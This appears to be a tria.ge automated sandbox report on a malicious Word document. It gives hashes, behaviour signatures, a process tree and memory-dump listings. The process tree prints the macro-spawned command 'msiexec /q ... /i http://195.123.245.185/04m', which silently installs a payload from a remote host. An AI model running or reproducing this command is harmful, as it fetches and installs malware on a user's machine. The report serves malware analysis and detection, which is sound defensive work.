Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

749042d083...18.doc

windows7-x64

10

749042d083...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    26/07/2024, 15:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    749042d0832ad213c28d2222a1b403e4_JaffaCakes118.doc

  • Size

    179KB

  • MD5

    749042d0832ad213c28d2222a1b403e4

  • SHA1

    84171e967cf6c9f1df44f8faaaa497171146fcaf

  • SHA256

    0bab91b3290a63c14f2bcc134e89c47b520f8e09d97d1771ec2c2506dce0a57e

  • SHA512

    d6ca8426c881d642eaf9bcc9cf3e1c0c82cbb8e48f89012cee30a9e84e0aebc3ea34980357ff707ee84271f5d7eeaa7eee8d323fb543bddce785b0f1db89e80e

  • SSDEEP

    3072:lr9qO4vcaSVmX1mnUaghvw5tyOM89g0hBh8/Km6pgVu+:TqO6caSn9ghY5t7hjhBh8imH

Score
10/10
discovery

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\749042d0832ad213c28d2222a1b403e4_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\SysWOW64\msiexec.exe
      msiexec /q step1=commonl step2=files /i http://195.123.245.185/04m
      2⤵
      • Process spawned unexpected child process
      • Use of msiexec (install) with remote resource
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2456
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2720
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      PID:2220

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      8b8b4427d2c5b9b5b04ab16d68be8356

      SHA1

      38bc01b2365d291859418b1d95805055cba22ee1

      SHA256

      9e1a308f74a2f957fc682c3760fdc4e66657e4df6a96df8eca342de050f8ff8c

      SHA512

      075ff488eb2b75c6e54139b3ac19811fe784d9a3fe0a8e815ff507f8659d63faa380d7e81e5cb1647e8a08ca95ba2cc329f4a0b9f92dd7a0610a046860b8fa1d

      Download Submit

    • memory/2076-6-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-18-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-5-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-0-0x000000002F311000-0x000000002F312000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2076-8-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-9-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-2-0x000000007104D000-0x0000000071058000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2076-11-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-7-0x0000000005EE0000-0x0000000005FE0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-17-0x000000007104D000-0x0000000071058000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2076-10-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2076-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2076-40-0x0000000000600000-0x0000000000700000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2076-39-0x000000007104D000-0x0000000071058000-memory.dmp

      Filesize

      44KB

      Download